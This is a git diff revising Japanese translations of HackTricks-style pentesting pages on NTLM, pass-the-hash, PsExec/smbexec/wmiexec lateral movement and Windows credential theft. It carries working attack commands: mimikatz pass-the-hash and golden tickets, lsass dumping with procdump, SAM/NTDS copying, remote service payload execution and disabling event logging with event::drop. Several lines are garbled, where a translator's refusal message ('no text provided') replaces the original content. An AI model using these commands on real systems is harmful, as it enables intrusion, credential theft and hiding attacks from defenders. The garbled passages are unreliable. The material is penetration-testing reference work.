-**dcomexec.py:** 異なるDCOMエンドポイントを利用して、このスクリプトはwmiexec.pyに似たセミインタラクティブなシェルを提供し、特にShellBrowserWindow DCOMオブジェクトを活用しています。現在、MMC20、アプリケーション、シェルウィンドウ、およびシェルブラウザウィンドウオブジェクトをサポートしています。(source: [Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/))
+**dcomexec.py:** 異なるDCOMエンドポイントを利用して、このスクリプトはwmiexec.pyに似たセミインタラクティブなシェルを提供し、特にShellBrowserWindow DCOMオブジェクトを活用しています。現在、MMC20、Application、Shell Windows、およびShell Browser Windowオブジェクトをサポートしています。(source: [Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/))
 
 ## WMIの基本
 
@@ -32,7 +32,7 @@ gwmi -Namespace "root/microsoft" -List -Recurse
 ### **クラス**
 
 WMIクラス名（例：win32_process）とその存在する名前空間を知ることは、すべてのWMI操作において重要です。  
-`win32`で始まるクラスをリストするコマンド：
+`win32`で始まるクラスをリストするためのコマンド：
 ```bash
 Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
 gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
diff --git a/src/windows-hardening/ntlm/README.md b/src/windows-hardening/ntlm/README.md
index 248dc4661..89d8f305e 100644
--- a/src/windows-hardening/ntlm/README.md
+++ b/src/windows-hardening/ntlm/README.md
@@ -6,7 +6,7 @@
 
 **Windows XP と Server 2003** が稼働している環境では、LM (Lan Manager) ハッシュが使用されますが、これらは簡単に侵害されることが広く認識されています。特定の LM ハッシュ `AAD3B435B51404EEAAD3B435B51404EE` は、LM が使用されていないシナリオを示し、空の文字列のハッシュを表します。
 
-デフォルトでは、**Kerberos** 認証プロトコルが主要な方法として使用されます。NTLM (NT LAN Manager) は特定の状況下で介入します：Active Directory の不在、ドメインの存在しない場合、誤った設定による Kerberos の不具合、または有効なホスト名ではなく IP アドレスを使用して接続を試みる場合です。
+デフォルトでは、**Kerberos** 認証プロトコルが主な方法として使用されます。NTLM (NT LAN Manager) は特定の状況下で介入します：Active Directory の不在、ドメインの存在しない場合、誤った設定による Kerberos の故障、または有効なホスト名ではなく IP アドレスを使用して接続を試みる場合です。
 
 ネットワークパケット内の **"NTLMSSP"** ヘッダーの存在は、NTLM 認証プロセスを示します。
 
@@ -25,7 +25,7 @@
 
 ### GUI
 
-_secpol.msc_ を実行 -> ローカルポリシー -> セキュリティオプション -> ネットワークセキュリティ: LAN マネージャー認証レベル。レベルは 0 から 5 の 6 段階です。
+_secpol.msc_ を実行 -> ローカルポリシー -> セキュリティオプション -> ネットワークセキュリティ: LAN Manager 認証レベル。レベルは 0 から 5 の 6 段階です。
 
 ![](<../../images/image (919).png>)
 
@@ -70,18 +70,18 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t RE
 - **ランダム性**の欠如
 - 3つの部分は**個別に攻撃**されてNTハッシュを見つけることができます
 - **DESは破られる可能性があります**
-- 3番目のキーは常に**5つのゼロ**で構成されます。
+- 3番目のキーは常に**5つのゼロ**で構成されています。
 - **同じチャレンジ**が与えられた場合、**応答**は**同じ**になります。したがって、被害者に**"1122334455667788"**という文字列を**チャレンジ**として与え、**事前計算されたレインボーテーブル**を使用して応答を攻撃できます。
 
 ### NTLMv1攻撃
 
 現在、制約のない委任が構成された環境を見つけることは少なくなっていますが、これは**構成されたPrint Spoolerサービス**を**悪用できない**ことを意味しません。
 
-すでにADに持っているいくつかの資格情報/セッションを悪用して、**プリンターに対して**自分の制御下にある**ホストに認証を要求**させることができます。その後、`metasploit auxiliary/server/capture/smb`または`responder`を使用して、**認証チャレンジを1122334455667788に設定**し、認証試行をキャプチャし、**NTLMv1**を使用して行われた場合は**クラック**できるでしょう。\
+すでにADに持っている資格情報/セッションを悪用して、**プリンターに対して**あなたの制御下にある**ホストに認証を要求**させることができます。その後、`metasploit auxiliary/server/capture/smb`または`responder`を使用して、**認証チャレンジを1122334455667788に設定**し、認証試行をキャプチャし、**NTLMv1**を使用して行われた場合は**クラック**できるようになります。\
 `responder`を使用している場合は、**フラグ`--lm`を使用して**認証を**ダウングレード**しようとすることができます。\
 &#xNAN;_この技術では、認証はNTLMv1を使用して行う必要があります（NTLMv2は無効です）。_
 
-プリンターは認証中にコンピューターアカウントを使用し、コンピューターアカウントは**長くてランダムなパスワード**を使用するため、一般的な**辞書**を使用して**クラック**することは**おそらくできません**。しかし、**NTLMv1**認証は**DES**を使用します（[こちらに詳細](./#ntlmv1-challenge)）、したがって、DESのクラックに特化したサービスを使用すれば、クラックできるでしょう（例えば、[https://crack.sh/](https://crack.sh)や[https://ntlmv1.com/](https://ntlmv1.com)を使用できます）。
+プリンターは認証中にコンピューターアカウントを使用し、コンピューターアカウントは**長くてランダムなパスワード**を使用するため、一般的な**辞書**を使用して**クラック**することは**おそらくできません**。しかし、**NTLMv1**認証は**DES**を使用します（[こちらに詳細情報](./#ntlmv1-challenge)）、したがって、DESのクラックに特化したサービスを使用すれば、クラックできるでしょう（例えば、[https://crack.sh/](https://crack.sh)や[https://ntlmv1.com/](https://ntlmv1.com)を使用できます）。
 
 ### hashcatを使用したNTLMv1攻撃
 
@@ -122,7 +122,7 @@ NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
 727B4E35F947129E:1122334455667788
 A52B9CDEDAE86934:1122334455667788
 ```
-ハッシュキャットを実行します（分散型はhashtopolisのようなツールを通じて行うのが最適です）。さもなければ、これには数日かかります。
+ハッシュキャットを実行します（分散型はhashtopolisなどのツールを通じて行うのが最適です）。さもなければ、これには数日かかります。
 ```bash
 ./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
 ```
@@ -135,7 +135,7 @@ DESKEY2: bcba83e6895b9d
 echo b55d6d04e67926>>des.cand
 echo bcba83e6895b9d>>des.cand
 ```
-ハッシュキャットユーティリティを使用して、クラックされたDESキーをNTLMハッシュの一部に変換する必要があります:
+ハッシュキャットユーティリティを使用して、クラックされたDESキーをNTLMハッシュの一部に変換する必要があります。
 ```bash
 ./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
 b4b9b02e6f09a9 # this is part 1
@@ -143,13 +143,13 @@ b4b9b02e6f09a9 # this is part 1
 ./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
 bd760f388b6700 # this is part 2
 ```
-申し訳ありませんが、翻訳する内容が提供されていません。翻訳が必要なテキストを提供してください。
+申し訳ありませんが、翻訳する内容が提供されていません。翻訳したいテキストを提供してください。
 ```bash
 ./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
 
 586c # this is the last part
 ```
-申し訳ありませんが、翻訳する内容が提供されていません。翻訳が必要なテキストを提供してください。
+I'm sorry, but I need the specific text you want translated in order to assist you. Please provide the relevant English text.
 ```bash
 NTHASH=b4b9b02e6f09a9bd760f388b6700586c
 ```
@@ -166,9 +166,9 @@ NTHASH=b4b9b02e6f09a9bd760f388b6700586c
 ## パス・ザ・ハッシュ
 
 **被害者のハッシュを取得したら**、それを使用して**なりすます**ことができます。\
-その**ハッシュ**を使用して**NTLM認証を実行する**ツールを使用する必要があります。**または**、新しい**セッションログオン**を作成し、その**ハッシュ**を**LSASS**内に**注入**することができます。これにより、任意の**NTLM認証が実行されると**、その**ハッシュが使用されます**。最後のオプションはmimikatzが行うことです。
+その**ハッシュ**を使用して**NTLM認証を実行する**ツールを使用する必要があります。**または**、新しい**セッションログオン**を作成し、その**ハッシュ**を**LSASS**内に**注入**することができます。これにより、任意の**NTLM認証が実行されると**、その**ハッシュが使用されます**。最後のオプションは、mimikatzが行うことです。
 
-**コンピュータアカウントを使用してもパス・ザ・ハッシュ攻撃を実行できることを忘れないでください。**
+**コンピュータアカウントを使用しても、パス・ザ・ハッシュ攻撃を実行できることを忘れないでください。**
 
 ### **Mimikatz**
 
@@ -176,12 +176,12 @@ NTHASH=b4b9b02e6f09a9bd760f388b6700586c
 ```bash
 Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
 ```
-これは、mimikatzを起動したユーザーに属するプロセスを起動しますが、LSASS内部では保存された資格情報はmimikatzのパラメータ内のものです。これにより、そのユーザーとしてネットワークリソースにアクセスできます（`runas /netonly`トリックに似ていますが、平文のパスワードを知る必要はありません）。
+このプロセスは、mimikatzを起動したユーザーに属するプロセスを起動しますが、LSASS内部では保存された資格情報はmimikatzのパラメータ内のものです。これにより、そのユーザーとしてネットワークリソースにアクセスできます（`runas /netonly`トリックに似ていますが、平文のパスワードを知る必要はありません）。
 
 ### LinuxからのPass-the-Hash
 
 LinuxからPass-the-Hashを使用してWindowsマシンでコード実行を取得できます。\
-[**ここでやり方を学ぶためにアクセスしてください。**](https://github.com/carlospolop/hacktricks/blob/master/windows/ntlm/broken-reference/README.md)
+[**ここで学ぶ方法にアクセスしてください。**](https://github.com/carlospolop/hacktricks/blob/master/windows/ntlm/broken-reference/README.md)
 
 ### Impacket Windowsコンパイルツール
 
@@ -214,7 +214,7 @@ Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff
 ```
 #### Invoke-TheHash
 
-この関数は**他のすべてのミックス**です。**複数のホスト**を渡すことができ、**除外**したいものを指定し、使用したい**オプション**を**選択**できます（_SMBExec, WMIExec, SMBClient, SMBEnum_）。**SMBExec**と**WMIExec**のいずれかを選択した場合、_**Command**_パラメータを指定しないと、単に**十分な権限**があるかどうかを**確認**します。
+この関数は**他のすべてのミックス**です。**複数のホスト**を渡すことができ、**除外**したい人を指定し、使用したい**オプション**を選択できます（_SMBExec, WMIExec, SMBClient, SMBEnum_）。**SMBExec**と**WMIExec**のいずれかを選択した場合、_**Command**_パラメータを指定しないと、単に**十分な権限**があるかどうかを**確認**します。
 ```
 Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0
 ```
@@ -236,18 +236,18 @@ wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
 
 ## Windowsホストからの資格情報の抽出
 
-**Windowsホストから資格情報を取得する方法についての詳細は** [**このページを読むべきです**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/broken-reference/README.md)**。**
+**Windowsホストから資格情報を取得する方法についての詳細は、** [**このページを読むべきです**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/broken-reference/README.md)**。**
 
 ## NTLMリレーとレスポンダー
 
-**これらの攻撃を実行する方法についての詳細なガイドをこちらで読む：**
+**これらの攻撃を実行する方法についての詳細なガイドはここで読むことができます：**
 
 {{#ref}}
 ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
 {{#endref}}
 
-## ネットワークキャプチャからNTLMチャレンジを解析する
+## ネットワークキャプチャからのNTLMチャレンジの解析
 
-**次のリンクを使用できます** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide)
+**次のリンクを使用できます：** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/ntlm/psexec-and-winexec.md b/src/windows-hardening/ntlm/psexec-and-winexec.md
index 12d2abdb6..7cba7246d 100644
--- a/src/windows-hardening/ntlm/psexec-and-winexec.md
+++ b/src/windows-hardening/ntlm/psexec-and-winexec.md
@@ -4,34 +4,34 @@
 
 ## どのように機能するか
 
-プロセスは以下のステップで概説されており、サービスバイナリがどのように操作され、SMBを介してターゲットマシンでリモート実行を達成するかを示しています：
+プロセスは以下のステップで概説されており、サービスバイナリがどのように操作され、SMBを介してターゲットマシンでリモート実行を達成するかを示しています。
 
 1. **ADMIN$共有にサービスバイナリをSMB経由でコピー**します。
 2. **リモートマシン上にサービスを作成**し、バイナリを指します。
 3. サービスが**リモートで開始**されます。
-4. 終了時に、サービスは**停止され、バイナリは削除**されます。
+4. 終了時に、サービスは**停止し、バイナリは削除**されます。
 
 ### **PsExecを手動で実行するプロセス**
 
-msfvenomで作成され、Veilを使用してウイルス対策検出を回避するように難読化された実行可能ペイロード「met8888.exe」を仮定すると、以下のステップが取られます：
+msfvenomで作成され、Veilを使用してウイルス対策検出を回避するように難読化された実行可能ペイロード「met8888.exe」があると仮定します。これはmeterpreter reverse_httpペイロードを表します。以下のステップが取られます。
 
-- **バイナリのコピー**：実行可能ファイルはコマンドプロンプトからADMIN$共有にコピーされますが、ファイルシステムのどこにでも配置して隠すことができます。
+- **バイナリのコピー**: 実行可能ファイルはコマンドプロンプトからADMIN$共有にコピーされますが、ファイルシステムのどこにでも配置して隠すことができます。
 
-- **サービスの作成**：Windowsの`sc`コマンドを利用して、リモートでWindowsサービスを照会、作成、削除することができ、「meterpreter」という名前のサービスがアップロードされたバイナリを指すように作成されます。
+- **サービスの作成**: Windowsの`sc`コマンドを使用して、リモートでWindowsサービスを照会、作成、削除することができ、「meterpreter」という名前のサービスがアップロードされたバイナリを指すように作成されます。
 
-- **サービスの開始**：最終ステップはサービスを開始することで、バイナリが本物のサービスバイナリでないため、期待される応答コードを返さず「タイムアウト」エラーが発生する可能性があります。このエラーは、主な目的がバイナリの実行であるため、重要ではありません。
+- **サービスの開始**: 最後のステップはサービスを開始することで、バイナリが本物のサービスバイナリでないため、期待される応答コードを返さずに「タイムアウト」エラーが発生する可能性があります。このエラーは重要ではなく、主な目標はバイナリの実行です。
 
 Metasploitリスナーを観察すると、セッションが正常に開始されたことがわかります。
 
 [scコマンドの詳細を学ぶ](https://technet.microsoft.com/en-us/library/bb490995.aspx)。
 
-詳細な手順については、こちらを参照してください: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+詳細な手順については、[https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)を参照してください。
 
-**Windows SysinternalsバイナリPsExec.exeを使用することもできます：**
+**Windows SysinternalsバイナリPsExec.exeを使用することもできます:**
 
 ![](<../../images/image (165).png>)
 
-[**SharpLateral**](https://github.com/mertdas/SharpLateral)を使用することもできます：
+[**SharpLateral**](https://github.com/mertdas/SharpLateral)を使用することもできます:
 ```
 SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe.exe malware.exe ServiceName
 ```
diff --git a/src/windows-hardening/ntlm/smbexec.md b/src/windows-hardening/ntlm/smbexec.md
index fb08ce3b1..3a90710b7 100644
--- a/src/windows-hardening/ntlm/smbexec.md
+++ b/src/windows-hardening/ntlm/smbexec.md
@@ -18,11 +18,11 @@ smbexec.py WORKGROUP/genericuser:genericpassword@10.10.10.10
 
 - **Smbexec** は、ターゲット上に物理的なバイナリが不要で、サービスの binPaths を通じて直接コマンドを実行することを可能にします。
 - この方法は、Windows ターゲット上で一時的なコマンドを実行するのに便利です。たとえば、Metasploit の `web_delivery` モジュールと組み合わせることで、PowerShell 対象のリバース Meterpreter ペイロードを実行できます。
-- 攻撃者のマシン上にリモートサービスを作成し、binPath を cmd.exe を通じて提供されたコマンドを実行するように設定することで、ペイロードを成功裏に実行し、サービス応答エラーが発生しても Metasploit リスナーでコールバックとペイロード実行を達成することが可能です。
+- 攻撃者のマシン上にリモートサービスを作成し、binPath を cmd.exe を通じて提供されたコマンドを実行するように設定することで、サービス応答エラーが発生しても、ペイロードを正常に実行し、Metasploit リスナーでコールバックとペイロードの実行を達成することが可能です。
 
 ### コマンドの例
 
-サービスを作成して開始するには、以下のコマンドを使用できます：
+サービスの作成と開始は、以下のコマンドで実行できます：
 ```bash
 sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"
 sc start [ServiceName]
diff --git a/src/windows-hardening/ntlm/wmiexec.md b/src/windows-hardening/ntlm/wmiexec.md
index 4781bfe52..721fdc49d 100644
--- a/src/windows-hardening/ntlm/wmiexec.md
+++ b/src/windows-hardening/ntlm/wmiexec.md
@@ -91,11 +91,11 @@ WMIを使用して特定の情報、例えばローカル管理者やログオ
 
 リモートマシン上のローカル管理者やログオンユーザーを stealthy に特定することは、特定のWMIクエリを通じて達成できます。`wmic`は、複数のノードでコマンドを同時に実行するためにテキストファイルからの読み取りもサポートしています。
 
-WMIを介してプロセスをリモートで実行するためには、Empireエージェントを展開するなど、以下のコマンド構造が使用され、成功した実行は戻り値「0」で示されます。
+WMIを介してプロセスをリモートで実行するためには、Empireエージェントを展開するなど、以下のコマンド構造が使用され、成功した実行は戻り値「0」で示されます：
 ```bash
 wmic /node:hostname /user:user path win32_process call create "empire launcher string here"
 ```
-このプロセスは、リモート実行とシステム列挙のためのWMIの能力を示しており、システム管理とペネトレーションテストの両方におけるその有用性を強調しています。
+このプロセスは、リモート実行とシステム列挙に対するWMIの能力を示しており、システム管理とペネトレーションテストの両方におけるその有用性を強調しています。
 
 ## 参考文献
 
diff --git a/src/windows-hardening/stealing-credentials/README.md b/src/windows-hardening/stealing-credentials/README.md
index 0811552e7..b3bb8e9f3 100644
--- a/src/windows-hardening/stealing-credentials/README.md
+++ b/src/windows-hardening/stealing-credentials/README.md
@@ -28,7 +28,7 @@ Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpa
 
 ## Meterpreterによる資格情報
 
-私が作成した[**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **を使用して、** **被害者の内部でパスワードとハッシュを検索します。**
+私が作成した[**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials)を使用して、**被害者の内部でパスワードとハッシュを検索**します。
 ```bash
 #Credentials from SAM
 post/windows/gather/smart_hashdump
@@ -45,12 +45,12 @@ mimikatz_command -f "sekurlsa::logonpasswords"
 mimikatz_command -f "lsadump::lsa /inject"
 mimikatz_command -f "lsadump::sam"
 ```
-## AVをバイパスする
+## AVのバイパス
 
 ### Procdump + Mimikatz
 
-**SysInternalsのProcdump**は**正当なMicrosoftツール**であるため、Defenderによって検出されません。\
-このツールを使用して、**lsassプロセスをダンプ**し、**ダンプをダウンロード**し、**ダンプからローカルに資格情報を抽出**できます。
+**SysInternalsの** [**Procdump**](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**は正当なMicrosoftツール**であるため、Defenderによって検出されません。\
+このツールを使用して、**lsassプロセスをダンプ**し、**ダンプをダウンロード**し、**ダンプからローカルに** **資格情報を抽出**できます。
 ```bash:Dump lsass
 #Local
 C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
@@ -131,9 +131,9 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
 ```
 #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
 ```
-## SAM & SYSTEMの盗難
+## SAMとSYSTEMの盗難
 
-このファイルは**_C:\windows\system32\config\SAM_**と**_C:\windows\system32\config\SYSTEM._**に**存在する必要があります**。しかし、**通常の方法でコピーすることはできません**。なぜなら、これらは保護されているからです。
+このファイルは**_C:\windows\system32\config\SAM_**と**_C:\windows\system32\config\SYSTEM._**に**存在する必要があります**。しかし、**通常の方法でコピーすることはできません**。なぜなら、保護されているからです。
 
 ### レジストリから
 
@@ -167,7 +167,7 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Ex
 # You can also create a symlink to the shadow copy and access it
 mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
 ```
-しかし、**Powershell**を使っても同じことができます。これは**SAMファイルをコピーする方法**の例です（使用するハードドライブは"C:"で、C:\users\Publicに保存されます）が、これは保護されたファイルをコピーするために使用できます：
+しかし、**Powershell**を使って同じことができます。これは**SAMファイルをコピーする方法**の例です（使用するハードドライブは"C:"で、C:\users\Publicに保存されます）が、これは保護されたファイルをコピーするために使用できます：
 ```bash
 $service=(Get-Service -name VSS)
 if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
@@ -194,7 +194,7 @@ Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c
 
 これに関する詳細情報: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/)
 
-Windowsは_Ntdsa.dll_を使用してそのファイルと対話し、_lsass.exe_によって使用されます。次に、**NTDS.dit**ファイルの**一部**は**`lsass`**メモリ内に存在する可能性があります（**キャッシュ**を使用することによるパフォーマンス向上のために、最新のアクセスデータを見つけることができるかもしれません）。
+Windowsは_Ntdsa.dll_を使用してそのファイルと対話し、_lsass.exe_によって使用されます。次に、**NTDS.dit**ファイルの**一部**は**`lsass`**メモリ内に存在する可能性があります（パフォーマンス向上のために**キャッシュ**を使用して最新のアクセスデータを見つけることができます）。
 
 #### NTDS.dit内のハッシュの復号化
 
@@ -204,7 +204,7 @@ Windowsは_Ntdsa.dll_を使用してそのファイルと対話し、_lsass.exe_
 2. **PEK**と**RC4**を使用して**ハッシュ**を復号化します。
 3. **DES**を使用して**ハッシュ**を復号化します。
 
-**PEK**は**すべてのドメインコントローラーで同じ値**を持っていますが、**NTDS.dit**ファイル内でドメインコントローラーの**SYSTEMファイルのBOOTKEY**を使用して**暗号化**されています（ドメインコントローラー間で異なります）。これが、NTDS.ditファイルから資格情報を取得するために**NTDS.ditとSYSTEMファイルが必要**な理由です（_C:\Windows\System32\config\SYSTEM_）。
+**PEK**は**すべてのドメインコントローラーで同じ値**を持っていますが、**NTDS.dit**ファイル内では**ドメインコントローラーのSYSTEMファイルのBOOTKEY**を使用して**暗号化**されています（ドメインコントローラー間で異なります）。これが、NTDS.ditファイルから資格情報を取得するために**NTDS.ditとSYSTEMファイルが必要**な理由です（_C:\Windows\System32\config\SYSTEM_）。
 
 ### Ntdsutilを使用したNTDS.ditのコピー
 
@@ -234,11 +234,11 @@ NTDS オブジェクトは、[ntdsdotsqlite](https://github.com/almandin/ntdsdot
 ```
 ntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive
 ```
-`SYSTEM` ハイブはオプションですが、秘密の復号化を可能にします（NTおよびLMハッシュ、平文パスワード、Kerberosまたは信頼キー、NTおよびLMパスワード履歴などの補足資格情報）。他の情報とともに、以下のデータが抽出されます：ユーザーおよびマシンアカウントとそのハッシュ、UACフラグ、最終ログオンおよびパスワード変更のタイムスタンプ、アカウントの説明、名前、UPN、SPN、グループおよび再帰的メンバーシップ、組織単位ツリーおよびメンバーシップ、信頼されたドメインと信頼の種類、方向および属性...
+`SYSTEM` ハイブはオプションですが、秘密の復号化を可能にします（NT & LM ハッシュ、平文パスワード、Kerberos または信頼キー、NT & LM パスワード履歴などの補足資格情報）。他の情報とともに、以下のデータが抽出されます：ハッシュを持つユーザーおよびマシンアカウント、UAC フラグ、最終ログオンおよびパスワード変更のタイムスタンプ、アカウントの説明、名前、UPN、SPN、グループおよび再帰的メンバーシップ、組織単位ツリーおよびメンバーシップ、信頼されたドメインと信頼の種類、方向および属性...
 
 ## Lazagne
 
-バイナリを[こちら](https://github.com/AlessandroZ/LaZagne/releases)からダウンロードします。このバイナリを使用して、いくつかのソフトウェアから資格情報を抽出できます。
+バイナリを [こちら](https://github.com/AlessandroZ/LaZagne/releases) からダウンロードします。このバイナリを使用して、いくつかのソフトウェアから資格情報を抽出できます。
 ```
 lazagne.exe all
 ```
@@ -265,7 +265,7 @@ type outpwdump
 ```
 ### PwDump7
 
-ダウンロードはこちらから:[ http://www.tarasco.org/security/pwdump_7](http://www.tarasco.org/security/pwdump_7) そして **実行するだけで** パスワードが抽出されます。
+ダウンロードはこちらから: [ http://www.tarasco.org/security/pwdump_7](http://www.tarasco.org/security/pwdump_7) そして **実行するだけで** パスワードが抽出されます。
 
 ## Defenses
 
diff --git a/src/windows-hardening/stealing-credentials/credentials-mimikatz.md b/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
index 5a9a11f2e..7ce489d1e 100644
--- a/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
+++ b/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
@@ -10,8 +10,8 @@ Windows 8.1 および Windows Server 2012 R2 以降、資格情報の盗難を
 
 - **LM ハッシュと平文パスワード** はセキュリティを強化するためにメモリに保存されなくなりました。特定のレジストリ設定、_HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_ を DWORD 値 `0` に設定してダイジェスト認証を無効にし、「平文」パスワードが LSASS にキャッシュされないようにする必要があります。
 
-- **LSA 保護** は、ローカル セキュリティ アuthority (LSA) プロセスを不正なメモリ読み取りやコード注入から保護するために導入されました。これは、LSASS を保護されたプロセスとしてマークすることによって実現されます。LSA 保護の有効化には：
-1. _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_ でレジストリを変更し、`RunAsPPL` を `dword:00000001` に設定します。
+- **LSA 保護** は、ローカル セキュリティ アuthority (LSA) プロセスを不正なメモリ読み取りやコード注入から保護するために導入されました。これは、LSASS を保護されたプロセスとしてマークすることによって実現されます。LSA 保護を有効にするには：
+1. _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_ のレジストリを変更し、`RunAsPPL` を `dword:00000001` に設定します。
 2. このレジストリ変更を管理されたデバイス全体に強制するグループポリシーオブジェクト (GPO) を実装します。
 
 これらの保護にもかかわらず、Mimikatz のようなツールは特定のドライバーを使用して LSA 保護を回避することができますが、そのような行動はイベントログに記録される可能性が高いです。
@@ -31,38 +31,38 @@ sc start TrustedInstaller
 ```
 ## Mimikatz オプション
 
-Mimikatz におけるイベントログの改ざんは、主に二つのアクションを含みます：イベントログのクリアと新しいイベントのログ記録を防ぐためのイベントサービスのパッチ適用。以下はこれらのアクションを実行するためのコマンドです：
+Mimikatz におけるイベントログの改ざんは、主に 2 つのアクションを含みます: イベントログのクリアと、新しいイベントのログ記録を防ぐためのイベントサービスのパッチ適用。以下は、これらのアクションを実行するためのコマンドです。
 
 #### イベントログのクリア
 
-- **コマンド**：このアクションは、イベントログを削除することを目的としており、悪意のある活動を追跡しにくくします。
-- Mimikatz は、コマンドラインを介してイベントログを直接クリアするための直接的なコマンドを標準のドキュメントには提供していません。しかし、イベントログの操作は通常、特定のログをクリアするために Mimikatz の外部でシステムツールやスクリプトを使用することを含みます（例：PowerShell や Windows Event Viewer を使用）。
+- **コマンド**: このアクションは、イベントログを削除することを目的としており、悪意のある活動を追跡しにくくします。
+- Mimikatz は、コマンドラインを介してイベントログを直接クリアするための直接的なコマンドを標準のドキュメントには提供していません。ただし、イベントログの操作は通常、特定のログをクリアするために Mimikatz の外部でシステムツールやスクリプトを使用することを含みます（例: PowerShell や Windows Event Viewer を使用）。
 
-#### 実験的機能：イベントサービスのパッチ適用
+#### 実験的機能: イベントサービスのパッチ適用
 
-- **コマンド**：`event::drop`
+- **コマンド**: `event::drop`
 - この実験的コマンドは、イベントログサービスの動作を変更するように設計されており、新しいイベントの記録を効果的に防ぎます。
-- 例：`mimikatz "privilege::debug" "event::drop" exit`
+- 例: `mimikatz "privilege::debug" "event::drop" exit`
 
 - `privilege::debug` コマンドは、Mimikatz がシステムサービスを変更するために必要な特権で動作することを保証します。
-- 次に、`event::drop` コマンドがイベントログサービスをパッチ適用します。
+- 次に、`event::drop` コマンドがイベントログサービスにパッチを適用します。
 
 ### Kerberos チケット攻撃
 
 ### ゴールデンチケットの作成
 
-ゴールデンチケットは、ドメイン全体へのアクセスのなりすましを可能にします。主なコマンドとパラメータ：
+ゴールデンチケットは、ドメイン全体へのアクセスのなりすましを可能にします。主なコマンドとパラメータ:
 
-- コマンド：`kerberos::golden`
-- パラメータ：
-- `/domain`：ドメイン名。
-- `/sid`：ドメインのセキュリティ識別子 (SID)。
-- `/user`：なりすますユーザー名。
-- `/krbtgt`：ドメインの KDC サービスアカウントの NTLM ハッシュ。
-- `/ptt`：チケットをメモリに直接注入します。
-- `/ticket`：後で使用するためにチケットを保存します。
+- コマンド: `kerberos::golden`
+- パラメータ:
+- `/domain`: ドメイン名。
+- `/sid`: ドメインのセキュリティ識別子 (SID)。
+- `/user`: なりすますユーザー名。
+- `/krbtgt`: ドメインの KDC サービスアカウントの NTLM ハッシュ。
+- `/ptt`: チケットをメモリに直接注入します。
+- `/ticket`: 後で使用するためにチケットを保存します。
 
-例：
+例:
 ```bash
 mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit
 ```
diff --git a/src/windows-hardening/stealing-credentials/credentials-protections.md b/src/windows-hardening/stealing-credentials/credentials-protections.md
index 6305df8c1..1ec584944 100644
--- a/src/windows-hardening/stealing-credentials/credentials-protections.md
+++ b/src/windows-hardening/stealing-credentials/credentials-protections.md
@@ -6,11 +6,11 @@
 
 ## WDigest
 
